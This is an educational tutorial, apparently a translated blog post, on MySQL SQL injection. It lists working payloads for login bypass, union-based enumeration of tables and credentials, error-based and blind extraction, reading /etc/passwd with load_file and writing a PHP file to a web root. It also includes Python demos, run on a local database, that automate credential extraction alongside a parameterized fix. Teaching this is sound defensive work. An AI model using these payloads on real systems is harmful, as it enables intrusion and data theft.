Basic knowledge of SQL injection

Source: Internet
Author: User
Tags: sql injection attack, sql injection methods


What is SQL Injection?

SQL injection is an attack in which the attacker places SQL syntax into a web form field or a URL query parameter so that the server builds and executes an SQL command the developer never intended. Forms whose input is used directly to build (or alter) dynamic SQL statements, or is passed unescaped as a parameter to a stored procedure, are the ones most exposed to this attack.

MySQL comments

#

-- [space] or --+ (MySQL only treats -- as a comment when it is followed by whitespace; in a URL query string the + decodes to a space, which is why --+ is common in payloads)

/* ... */

Note that when these sequences travel in a URL they may need to be URL-encoded: # must be sent as %23 (otherwise the browser treats it as the fragment marker and never sends it to the server), and the space after -- as %20 or +.

MySQL authentication bypass

;%00 (a URL-encoded null byte; some back ends stop reading the string at it, dropping whatever the application appended)

' or 1=1 #

' /*!or*/ 1=1 --+ (the /*! ... */ form is a MySQL "executable comment": the server still runs its contents, which can hide the keyword from a naive filter)
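As an added illustration of the definition above and of the ' or 1=1 bypass (example code written for this page, not taken from the original article): a login check that builds its query by string formatting, next to the parameterized version of the same check. SQLite stands in for MySQL so the example runs offline, which is why the payload ends with the -- comment marker rather than MySQL's #; the users table and its credentials are constructed sample data, and the function names are this example's own.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany(
        "insert into users values (?,?,?)",
        [(1, "zhangsan", "s3cret"), (2, "admin", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement with string formatting, so the user's input
    becomes part of the SQL text. Returns True when a row matches."""
    sql = "select id from users where username='%s' and password='%s'" % (
        username,
        password,
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterized statement: the driver passes the values separately
    from the SQL text, so quotes and comment markers stay data."""
    sql = "select id from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    """Runs both checks with real credentials and with the bypass payload.
    The payload closes the quote, adds an always-true condition and comments
    out the password check: ... where username='' or 1=1 -- ' and password=..."""
    conn = make_db()
    bypass = "' or 1=1 -- "
    return {
        "valid_creds_vuln": login_vulnerable(conn, "zhangsan", "s3cret"),
        "bypass_vuln": login_vulnerable(conn, bypass, "anything"),
        "valid_creds_safe": login_safe(conn, "zhangsan", "s3cret"),
        "bypass_safe": login_safe(conn, bypass, "anything"),
    }
```

The parameterized version still authenticates the real user, but the bypass string is compared as a literal username and matches nothing; that is the whole fix, and it does not depend on filtering quotes or comment markers.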

String concatenation in MySQL

In MySQL, + is numeric addition, not string concatenation (concatenation is done with concat(), or with || when sql_mode includes PIPES_AS_CONCAT). The following comparison is nevertheless true, which is why it sometimes appears in payloads:

select * from users where username='zhangsan' and "ab"="a"+"b";

"a"+"b" is evaluated as 0+0=0, and "ab" is converted to 0 for the numeric comparison, so 0=0 holds (each conversion raises a "Truncated incorrect DOUBLE value" warning, which a web application normally never shows).

Common functions in MySQL

MySQL's built-in functions are used heavily during SQL injection. They fall into information functions, which return facts about the server and the current session, and ordinary functions, which perform an operation on their arguments.

Common information functions include:

database(): returns the name of the database currently in use.

version(): returns the server version; equivalent to @@version.

user(): returns the account name the client supplied when connecting, together with the host it connected from; current_user() returns the account the server actually authenticated. They are usually, but not always, the same. For example:

select user();        # root@localhost
select current_user;  # root@localhost

@@datadir: the directory in which the server stores its data files.

select @@datadir;     # D:\xampp\mysql\data\

Common ordinary functions include:

load_file(): reads a file from the server's filesystem and returns its contents. It requires the FILE privilege, and the path must be allowed by secure_file_priv (when that variable is NULL, load_file() always returns NULL).

select * from users union select 1, load_file('/etc/passwd'), 3;
select * from users union select 1, load_file(0x2F6574632F706173737764), 3;   # the path as a hex literal, so no single quotes are needed

into outfile: writes a result set to a file. It requires the FILE privilege, the target directory must be writable by the server process and allowed by secure_file_priv, and the file must not already exist.

select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';
select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';   # the same payload built with char(), so no quotes are needed

concat(): returns the concatenation of its arguments; if any argument is NULL, the result is NULL.

The usage is as follows:

select concat(username,password) from users;

concat_ws(): like concat(), but the first argument is a separator placed between the remaining arguments (NULL arguments are skipped rather than making the whole result NULL).

select concat_ws(',',username,password) from users;

group_concat(): merges values from multiple rows into one string.

The usage is as follows:

select group_concat(username) from users;   # all usernames in the users table, returned as a single record

The result is silently truncated to group_concat_max_len bytes (1024 by default), so a long list of tables or columns may have to be fetched with limit/offset instead.

substring(), substr(): extract part of a string. Usage: substr(str,pos,length); note that pos starts at 1.

select substr((select database()),1,1);

ascii(): returns the ASCII code of the first character of its argument.

select ascii('a');   # 97

length(): returns the length of a string in bytes (char_length() counts characters, which matters for multi-byte data).

For example:

select length("123456");   # returns 6

if(exp1,exp2,exp3): if exp1 is true, returns exp2; otherwise returns exp3.

For example:

select 1,2,if(1=1,3,-1);   # 1,2,3
select 1,2,if(1=2,3,-1);   # 1,2,-1

The functions above are the ones used most often in SQL injection. A few others are occasionally useful:

now(): returns the current system time.

hex(): returns the hexadecimal representation of its argument.

unhex(): the inverse of hex(); decodes a hexadecimal string back to its bytes.

@@basedir: the MySQL installation directory.

@@version_compile_os: the operating system the server was built for.

MySQL database metadata

MySQL contains a database named information_schema. It stores metadata about every other database on the server: database names, tables, column names and access permissions. Commonly used tables in information_schema are:

schemata: one row per database on the server. The result is the same as that of show databases.

tables: one row per table, including the schema it belongs to, its type and its storage engine.

The result of show tables from security comes from this table.

columns: one row per column of every table, with that column's type and other attributes.

The result of show columns from users comes from this table.

The following shows how to use these three tables to enumerate a database:

select database();   # the currently selected database
select schema_name from information_schema.schemata limit 0,1;   # databases, one at a time
select table_name from information_schema.tables where table_schema=database() limit 0,1;   # tables in the current database
select column_name from information_schema.columns where table_name='users' limit 0,1;   # columns of the users table

Increase the offset in limit to walk through the remaining rows, or use group_concat() to pull them all in one query.

SQL Injection Types

SQL injection can be roughly divided into conventional injection, where the query result is shown in the page, and blind injection, where it is not. Blind injection is in turn divided into boolean-based blind injection, which reads a true/false answer from differences in the page content, and time-based blind injection, which reads it from the response time.
There are many explanations of blind injection on the Internet, so it is not covered at length here; the idea is easiest to see from concrete examples.
Time-based injection normally relies on the if() and sleep() functions.

The basic SQL expression is as follows:

select * from users where id=1 and if(length(user())=14,sleep(3),1);
select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);

root@localhost is 14 characters long and starts with r, so on a default installation both queries pause for 3 seconds; with any other account they return immediately.

Wide byte injection

For details, see the separate article on wide-byte injection. It arises when the application escapes quotes with a backslash (0x5c) but the connection uses a multi-byte character set such as GBK: a preceding high byte such as %df or %d5 combines with the backslash into a single two-byte character, leaving the quote that follows unescaped. Prefixing the quote with %df or %d5 therefore bypasses the escaping.

Summary of common MySQL statements

Regular (union-based) injection

1' order by N #
Find the number of columns: increase N until the query errors; the last N that works is the column count.

1' union select 1,2,3 #
Confirm the column count (the union only succeeds with the right number of columns).

-1' union select 1,2,3 #
A non-existent id empties the original result, so the numbers that now show on the page identify which columns are rendered.

-1' union select 1,2,group_concat(schema_name) from information_schema.schemata #
List all databases on the server.

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="dbname" #
List the tables of a database; table_schema=database() selects the current one, and the name can also be given as a hex literal (e.g. 0x7365637572697479 for security) when quotes are filtered.

-1' union select 1,2,column_name from information_schema.columns where table_name="table_name" limit 0,1 #
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name" #
List the columns of a table, one at a time or all at once; again the table name may be given as a hex literal.

-1' union select 1,2,3 and '1'='1
When a comment marker cannot be used, close the original quote instead of commenting it out.
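A worked version of the first four steps above (column count, displayed columns, table names, then data), added for this page rather than taken from the original article. SQLite stands in for MySQL so it runs offline: sqlite_master takes the place of information_schema.tables and -- replaces # as the comment marker. The page() function, which models an endpoint that pastes its id parameter into the query and shows the rows it gets back, and the users/emails tables are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany(
        "insert into users values (?,?,?)",
        [(1, "zhangsan", "s3cret"), (2, "admin", "hunter2")],
    )
    conn.execute("create table emails (id integer, addr text)")
    return conn


def page(conn, id_param):
    """Vulnerable endpoint: id_param is pasted into the query text.
    Returns the rows the page would display, or None when SQL fails,
    which models a page that renders an error instead of content."""
    try:
        sql = "select id, username, password from users where id='%s'" % id_param
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def count_columns(conn, max_cols=20):
    """Step 1: 'order by N' fails once N exceeds the column count."""
    for n in range(1, max_cols + 1):
        if page(conn, "1' order by %d -- " % n) is None:
            return n - 1
    return None


def union_extract(conn, expr, ncols, shown_col=1):
    """Steps 2-4: a negative id empties the original result, so the only
    row displayed is the one our UNION SELECT appends. expr is placed in
    the column the page renders (here the second, index 1, found in a
    real attack by looking at which of the numbers 1,2,3 appears)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[shown_col] = expr
    rows = page(conn, "-1' union select %s -- " % ",".join(cols))
    return rows[0][shown_col] if rows else None


def demo():
    conn = make_db()
    ncols = count_columns(conn)
    tables = union_extract(
        conn, "(select group_concat(name) from sqlite_master where type='table')", ncols
    )
    creds = union_extract(
        conn, "(select group_concat(username || ':' || password) from users)", ncols
    )
    return ncols, tables, creds
```

Against MySQL the two subqueries would read from information_schema.tables and use concat_ws() instead of the || operator; the probing logic is otherwise the same.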

Double query (error-based) injection

select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables;
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a;

The first two statements only build up the expression; the third is the one that matters. Because rand() is evaluated again while MySQL groups the rows, the key it looks up and the key it then inserts into the temporary group-by table can differ, and the statement fails with a duplicate-entry error that quotes the key, for example "Duplicate entry '::security::1' for key 'group_key'". Whatever was concatenated into the key, here database(), is leaked through the error message. The collision is probabilistic, so the query occasionally has to be repeated. The same construction reads table names:

select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a;

Injected into a parameter it looks like this:

1' and (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b) --+

This technique obtains the required information from the error message MySQL produces while executing the statement, so it only works when the application echoes database errors to the page. A later article analyses it in detail.

Boolean-based blind injection

1' and ascii(substr((select database()),1,1))>99 #
1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90 #

Boolean-based blind injection reads the truth value of the injected condition from the page content: the page renders normally when the condition is true and differently (often empty) when it is false. Comparing the ASCII code against a threshold rather than a single value allows a binary search, about seven requests per character instead of up to 95.

Time-based blind injection

1' and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) --+
1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+

The two statements are equivalent. Time-based blind injection differs from the other methods in that the page content is identical whether the condition is true or false; the attacker instead measures the response time to learn whether sleep() was executed, and so answers the question one bit at a time just as in boolean-based injection.

Choose a delay clearly longer than normal network jitter, and remember that sleep() is evaluated for every row the where clause examines, so a condition placed in a query that scans many rows can stall the server for far longer than intended.
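The extraction loop that the boolean-based and time-based sections above describe, written out as an added example for this page (not code from the original article): find the length of a value, then recover each character by binary search on its code point, asking the vulnerable page one yes/no question per request. SQLite stands in for MySQL so it runs offline; its unicode() replaces MySQL's ascii(), substr() and length() behave the same, and the -- marker replaces #. The boolean_oracle() function, which models a page that shows the id=1 record only when the injected condition is true, and the users table are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany(
        "insert into users values (?,?,?)",
        [(1, "zhangsan", "s3cret"), (2, "admin", "hunter2")],
    )
    return conn


def boolean_oracle(conn, condition):
    """The vulnerable endpoint seen as an oracle: the page shows the id=1
    record when the injected condition is true and nothing when it is false.
    Each call here corresponds to one HTTP request in a real attack."""
    sql = "select username from users where id='1' and (%s) -- '" % condition
    return conn.execute(sql).fetchone() is not None


def extract(oracle, expr, max_len=64):
    """Blind extraction of the string produced by the SQL expression expr.

    A time-based variant changes only the oracle: wrap the condition as
    if(cond, sleep(n), 0) and return (elapsed >= n) instead of looking at
    the page content; this loop stays the same."""
    length = 0
    for n in range(max_len + 1):
        if oracle("length((%s))=%d" % (expr, n)):
            length = n
            break

    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII; widen if the data may contain more
        while lo < hi:
            mid = (lo + hi) // 2
            # "is the character at pos greater than mid?" (MySQL: ascii() instead of unicode())
            if oracle("unicode(substr((%s),%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo():
    """Recovers the admin password one bit of information per request."""
    conn = make_db()
    return extract(lambda cond: boolean_oracle(conn, cond),
                   "select password from users where id=2 limit 0,1")
```

Binary search over 32..126 costs at most seven oracle calls per character, which is what makes blind extraction practical; on MySQL the same expressions would target database() or information_schema as shown in the statements above.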

Summary

The above is the basic knowledge needed for SQL injection. The next article explains SQL injection in detail through examples; today's article covers only the fundamentals. If you are interested in SQL injection, please stay tuned to the Help House.
